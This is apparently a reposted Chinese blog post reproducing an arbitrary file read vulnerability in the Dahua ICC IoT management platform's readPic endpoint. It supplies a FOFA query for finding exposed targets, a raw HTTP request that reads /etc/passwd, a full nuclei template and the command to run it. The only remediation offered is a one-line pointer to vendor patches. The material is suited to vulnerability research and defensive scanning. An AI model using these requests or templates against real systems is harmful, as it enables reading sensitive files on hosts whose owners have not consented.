【漏洞复现】大华ICC readpic任意文件读取漏洞 nuclei poc

admin 2023年11月3日08:45:07评论198 views字数 1257阅读4分11秒阅读模式


使



01

漏洞名称



大华ICC readpic任意文件读取漏洞


02


漏洞影响


华ICC智能物联综合管理平台

【漏洞复现】大华ICC readpic任意文件读取漏洞 nuclei poc


03


漏洞描述


2021年大华全新发布的ICC架构下的基础停车业务系统,基于硬件+平台+服务能力,依托集中化管控模式,提供中大型园区集团化管理、多社区停车场联网等项目的集成应用,打造集停车场管理、运营和生态于一体的赋能平台,实现降本、增收、提效。大华ICC智能物联综合管理平台存在任意文件读取漏洞,会造成敏感信息泄露。


04


FOFA搜索语句

body="*客户端会小于800*"

【漏洞复现】大华ICC readpic任意文件读取漏洞 nuclei poc



05


漏洞复现


poc如下

GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

【漏洞复现】大华ICC readpic任意文件读取漏洞 nuclei poc

证明存在漏洞



06


nuclei poc


id: dahua-icc-readpic-anyfileread
info: name: 大华ICC readpic任意文件读取漏洞 author: fgz severity: high description: | 2021年大华全新发布的ICC架构下的基础停车业务系统,基于硬件+平台+服务能力,依托集中化管控模式,提供中大型园区集团化管理、多社区停车场联网等项目的集成应用,打造集停车场管理、运营和生态于一体的赋能平台,实现降本、增收、提效。大华ICC智能物联综合管理平台存在任意文件读取漏洞,会造成敏感信息泄露。 tags: 2023,dahua,fileread metadata: max-request: 2 fofa-query: body="*客户端会小于800*" verified: true
http: - method: GET path: - "{{BaseURL}}/evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd" matchers: - type: regex part: body regex: - "root:.*?:[0-9]*:[0-9]*:"

运行POC

.nuclei.exe -t mypoc/大华/dahua-icc-readpic-anyfileread.yaml -u https192.168.86.128:8443

【漏洞复现】大华ICC readpic任意文件读取漏洞 nuclei poc



07


修复建议


关注官方安全中心补丁发布信息。


原文始发于微信公众号(AI与网安):【漏洞复现】大华ICC readpic任意文件读取漏洞 nuclei poc

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月3日08:45:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】大华ICC readpic任意文件读取漏洞 nuclei pochttp://cn-sec.com/archives/2171726.html

发表评论

匿名网友 填写信息